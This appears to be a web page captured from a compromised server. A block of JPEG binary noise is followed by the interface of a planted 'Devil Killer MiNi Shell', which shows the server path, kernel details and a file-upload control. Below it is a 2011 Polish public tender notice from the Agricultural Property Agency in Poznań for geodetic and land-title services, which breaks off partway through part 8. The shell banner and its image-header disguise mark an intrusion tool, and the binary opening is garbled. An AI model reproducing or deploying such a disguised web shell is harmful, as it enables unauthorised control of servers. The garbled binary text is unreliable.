JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111004/260503-N-2011.html

<p class="kh_header"><b>Poznań: Usługi geodezyjne - numer postępowania 016/POZ/67/2011</b><br>
<b>Numer ogłoszenia: 260503 - 2011; data zamieszczenia: 04.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy , ul. Fredry 12, 61-701 Poznań, woj. wielkopolskie, tel. 061 8560681, faks 061 8515092.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi geodezyjne - numer postępowania 016/POZ/67/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I: Ustalenie stanu prawnego działek nr 84 o pow. 33,1500 ha i nr 81 o pow. 17,5600 ha położonych w obrębie Przysieka gmina Mieleszyn.

Część II: Podział geodezyjny w trybie rolnym działki, oznaczonej numerem 135 o powierzchni 2,4100 ha położonej w obrębie Jerzyn, gmina Pobiedziska.

Część III: Badanie stanu prawnego dla działek z obrębu Pacholewo gm. Oborniki.

Część IV: Ustalenie stanu prawnego i numerów ksiąg wieczystych oraz sporządzenie wyciągu synchronizacyjnego potwierdzonego przez PODGiK w Gnieźnie dla nieruchomości położonych w obrębie Dziadkowo, Dziadkówko gminia Mieleszyn.

Część V: Ustalenie nr KW,  sporządzenie wyciągu z wykazu zmian gruntowych oraz sporządzenie protokołu badania stanu prawnego dla działek położonych w obrębie Sokołowice gmina Przemęt.

Część VI: Sporządzenie wyciągu (wyciągów) z wykazu zmian gruntowych oraz sporządzenie protokołu badania stanu prawnego dla działek położonych w obrębie Moraczewo gmina Rydzyna.

Część VII: Ustalenie ksiąg wieczystych i wykonanie badania stanu prawnego nieruchomości położonych w obrębie Zakrzew gmina Jarocin z historią byłego właściciela.

Część VIII:   Ustalenie ksiąg wieczystych i wykonanie badania stanu prawnego nieruchomości położonych w obrębie Zamęty i Przyranie gmina Mycielin z historią byłego właściciela. Sporządzenie wyciągu synchronizacyjnego dla działek położonych w obrębie Miasto Kalisz.

Część IX: Wykonanie weryfikacji danych ewidencyjnych w celu sporządzenia kartoteki budynku (§ 26 ust 1 Rozp. Ministra Rozwoju Regionalnego i Budownictwa z dn. 29.03.2001 w sprawie ewidencji gruntów i budynków) dla nieruchomości położonych w Topoli gmina Środa Wlkp. oraz Runowie gmina Kórnik.

Część X: Podział geodezyjny nieruchomości położonych w obrębie Wituchowo, gmina Kwilcz, oznaczonych w ewidencji gruntów jako działki nr 10/11 i 6.

Część XI: sporządzenie protokołu z przeprowadzenia badania stanu prawnego nieruchomości położonych: w obrębie Glinno gm. Skoki oraz obrębie Raczkowo gm. Skoki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje geodetą/geodetami posiadającymi świadectwo nadania uprawnień zawodowych w zakresie geodezji i kartografii, wydane zgodnie z przepisami Ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (Dz. U. nr 240 poz. 2027 z  2005r.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na potwierdzenie tego, że Wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy PZP, Wykonawca zobowiązany jest złożyć pisemne oświadczenie o spełnianiu tych warunków. Odpowiednie oświadczenie znajduje się w Formularzu oferty. Podpisanie formularza oferty równoznaczne jest ze złożeniem oświadczenia o spełnianiu wyżej wspomnianych warunków.
Wykonawca zobowiązany jest dołączyć do oferty dokument, z którego wynika upoważnienie wykonawcy do podpisania oferty lub pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik.
W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu składa każdy z wykonawców oddzielnie. 
Zamawiający zażąda przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów wymaganych  lub którzy złożyli dokumenty zawierające błędy, zamawiający wezwie do ich uzupełnienia wyznaczając termin, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej:
1. Zmiana terminu realizacji przedmiotu umowy:
1.1 Zmiany spowodowane warunkami atmosferycznymi
a) klęski żywiołowe
b) udokumentowane warunki atmosferyczne uniemożliwiające przeprowadzenie czynności związanych z wykonywaną sługą.
1.2 Zmiany będące następstwem konieczności wprowadzenia zmian w zakresie usługi z przyczyn nie wynikających ze strony Wykonawcy.
1.3 Zmiany będące następstwem działania organów administracji a w szczególności:
a) przekroczenie określonych przez prawo terminów wydawania przez osoby trzecie wypisów, wyrysów, opinii decyzji, zaświadczeń itp. skutkujące niemożliwością wykonania zamówienia
b) wstrzymanie realizacji przedmiotu umowy jako następstwo działania osób trzecich
1.4 Zmiany spowodowane działaniem lub brakiem działania osób a uniemożliwiające przeprowadzenie czynności związanych z wykonywaną sługą.
1.5 siła wyższa uniemożliwiającą wykonanie przedmiotu umowy zgodnie z SIWZ lub treścią umowy
2. Pozostałe zmiany
a) zmiana danych stron umowy związanych z obsługą administracyjno-organizacyjną umowy np. zmiana adresu
3. W przypadku wystąpienia którejkolwiek okoliczności wymienionych w pkt. 1 termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty. Ciężar udowodnienia faktu w takim układzie spoczywa na wykonawcy przedmiotowego zamówienia.
4. W przypadku wystąpienia okoliczności wymienionej w pkt. 2 strony niezwłocznie powiadomią się wzajemnie pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych ul. Fredry 12, 61-701 Poznań pok. 217.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.10.2011 godzina 08:00, miejsce: Agencja Nieruchomości Rolnych ul. Fredry 12, 61-701 Poznań - parter recepcja zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ustalenie stanu prawnego działek nr 84 o pow. 33,1500 ha i nr 81 o pow. 17,5600 ha położonych w obrębie Przysieka gmina Mieleszyn..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ustalenie stanu prawnego działek nr 84 o pow. 33,1500 ha i nr 81 o pow. 17,5600 ha położonych w obrębie Przysieka gmina Mieleszyn. Rozliczenie KW nr PO1G/00004998/5 prowadzonej przez SR w Gnieźnie oraz sporządzenie wyciągu synchronizacyjnego potwierdzonego przez PODGiK Gniezno..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Podział geodezyjny w trybie rolnym działki, oznaczonej numerem 135 o powierzchni 2,4100 ha położonej w obrębie Jerzyn, gmina Pobiedziska..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podział geodezyjny w trybie rolnym działki, oznaczonej numerem 135 o powierzchni 2,4100 ha położonej w obrębie Jerzyn, gmina Pobiedziska zapisanej w KW nr PO1G/00027097/6 w SR w Gnieźnie. Podziału dokonać należy zgodnie z postanowieniem Sądu Rejonowego w Gnieźnie i  zgodnie z załączoną mapą schematyczną oraz projektem podziału (załącznik nr 6a do SIWZ), z którego wynika, że z działki numer 135 powstać mają dwie działki o numerach 135/1 - pow. 0,6672 ha i numer 135/2 - pow. 1,6071 ha. Przy podziale określić należy granice powstałych działek wraz z wyniesieniem kamieni granicznych na gruncie oraz sporządzić wyciąg z wykazu zmian gruntowych potwierdzony przez Starostwo Powiatowe w Gnieźnie. W studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy przedmiotowa działka położona jest w strefie II rolno przyrodniczej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Badanie stanu prawnego dla działek z obrębu Pacholewo gm. Oborniki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Badanie stanu prawnego dla działek z obrębu Pacholewo gm. Oborniki, oznaczonych jako:
- nr 71/3 o pow. 10,2200 ha  - KW nr PO1O/00015725/9 - SR Oborniki
- nr 4/6 o pow. 2,3830 ha - KW Pacholewo dobra Tom II, karta 45 - SR Oborniki
Zakres badania dla powyższych działek obejmuje:
- podanie właściciele przedwojennego
- podanie ostatniego właściciele przed Skarbem Państwa
- podanie podstawy przejęcia nieruchomości na Skarb Państwa
- sporządzenie mapy stanu prawnego z wkreśleniem zmian własności
- sporządzenie wyciągów z wykazu zmian gruntowych dla KW nr PO1O/00015725/9 i KW Pacholewo dobra Tom II, karta 45 celem ujawnienia działek w KW i wpisania właściciela tj. SP - ANR OT Poznań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ustalenie stanu prawnego i numerów ksiąg wieczystych oraz sporządzenie wyciągu synchronizacyjnego potwierdzonego przez PODGiK w Gnieźnie dla nieruchomości położonych w obrębie Dziadkowo, Dziadkówko gminia Mieleszyn..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ustalenie stanu prawnego i numerów ksiąg wieczystych oraz sporządzenie wyciągu synchronizacyjnego potwierdzonego przez PODGiK w Gnieźnie dla nieruchomości położonych w gminie Mieleszyn oznaczonych jako:
1) obręb Dziadkowo, działki nr: 11 o pow. 17,5400 ha, 18/9 o pow. 10,9161 ha, 2 o pow. 8,9400 ha, 20 o pow. 7,4000 ha, 26 o pow. 12,1700 ha, 30/1 o pow. 62,6677 ha, 30/4 o pow. 4,2153 ha, 30/7 o pow. 31,8535 ha, 32 o pow. 7,2300 ha, 37 o pow. 4,1900 ha, 5 o pow. 7,3500 ha, 7 o pow. 29,38 ha, 9 o pow. 46,6700 ha 
2) obręb Dziadkówko,  działka numer 14 o pow. 4,9600 ha..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ustalenie nr KW,  sporządzenie wyciągu z wykazu zmian gruntowych oraz sporządzenie protokołu badania stanu prawnego dla działek położonych w obrębie Sokołowice gmina Przemęt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) ustalenie numeru księgi wieczystej i sporządzenie wyciągu (wyciągów)  z wykazu zmian gruntowych dla  ksiąg wieczystych, obejmujących między innymi działki nr 197, 199 i 205 położone w obrębie Sokołowice, gm. Przemęt oraz wszystkie działki znajdujące się w tej księdze, potwierdzonego przez Starostwo Powiatowe w Wolsztynie, w celu sporządzenia wniosku do Sądu Rejonowego o uregulowanie działu I księgi wieczystej, 
b) sporządzenie protokółu badania stanu prawnego wszystkich działek objętych przedmiotowym wyciągiem  wykazu zmian gruntowych i zapisanych w księdze wieczystej  prowadzonej przez Sąd Rejonowy w Wolsztynie, poprzez ustalenie nazwisk wszystkich właścicieli przed Skarbem Państwa, ustalenie nazwiska właściciela majątku, z którego nastąpiła ewentualna parcelacja po II wojnie światowej (w przypadku gdy miała miejsce, to na kogo  i w jakiej części), ustalenie podstawy prawnej przejęcia nieruchomości na Skarb Państwa, od 1939 roku do dnia przejęcia na Skarb Państwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sporządzenie wyciągu (wyciągów) z wykazu zmian gruntowych oraz sporządzenie protokołu badania stanu prawnego dla działek położonych w obrębie Moraczewo gmina Rydzyna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) sporządzenie wyciągu (wyciągów)  z wykazu zmian gruntowych dla  księgi wieczystej K W nr PO1L/00000373/2, obejmujących między innymi działki nr 274, 273, 266, 267, 268/1, 269, 270, 271, 263/4, 262/7, 265 i 272  położone w obrębie Moraczewo, gm. Rydzyna oraz wszystkie działki znajdujące się w tej księdze, potwierdzonego przez Starostwo Powiatowe w Lesznie, w celu sporządzenia wniosku do Sądu Rejonowego o uregulowanie działu I księgi wieczystej, 
b) sporządzenie protokółu badania stanu prawnego wszystkich działek objętych przedmiotowym wyciągiem  wykazu zmian gruntowych i zapisanych w księdze wieczystej  prowadzonej przez Sąd Rejonowy w Lesznie, poprzez ustalenie nazwisk wszystkich właścicieli przed Skarbem Państwa, ustalenie nazwiska właściciela majątku, z którego nastąpiła ewentualna parcelacja po II wojnie światowej (w przypadku gdy miała miejsce, to na kogo  i w jakiej części), ustalenie podstawy prawnej przejęcia nieruchomości na Skarb Państwa, od 1939 roku do dnia przejęcia na Skarb Państwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ustalenie ksiąg wieczystych i wykonanie badania stanu prawnego nieruchomości położonych w obrębie Zakrzew gmina Jarocin z historią byłego właściciela..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ustalenie ksiąg wieczystych i wykonanie badania stanu prawnego nieruchomości z historią byłego właściciela w okresie 1939 do 1992 z podaniem podstawy prawnej przejęcia na Skarb Państwa, a w przypadku powtarzających się opisanie tych podstaw prawnych przejęcia (decyzje, orzeczenia, protokoły etc.). Rezultatem tego opracowania powinno być:
- ustalenie księgi wieczystej
-na kopii mapy ewidencyjnej wykreślona działka ewidencyjna,
-wykreślenie sytuacji własnościowej na dzień 1.09.1939r. oraz dalsza historia właścicieli spowodowana różnymi okolicznościami (parcelacja, wymiana, regulacja, scalanie, wywłaszczenie itp.)
Zamówienie dotyczy:
Obręb Zakrzew gmina Jarocin - działki nr : 335/4,  332,  331,  335/1,  333/3,  333/3,  335/2, 333/4,  336/1,  341/1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.32.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ustalenie ksiąg wieczystych i wykonanie badania stanu prawnego nieruchomości położonych w obrębie Zamęty i Przyranie gmina Mycielin z historią byłego właściciela. Sporządzenie wyciągu synchronizacyjnego dla działek położonych w obrębie Miasto Kalisz..</p>
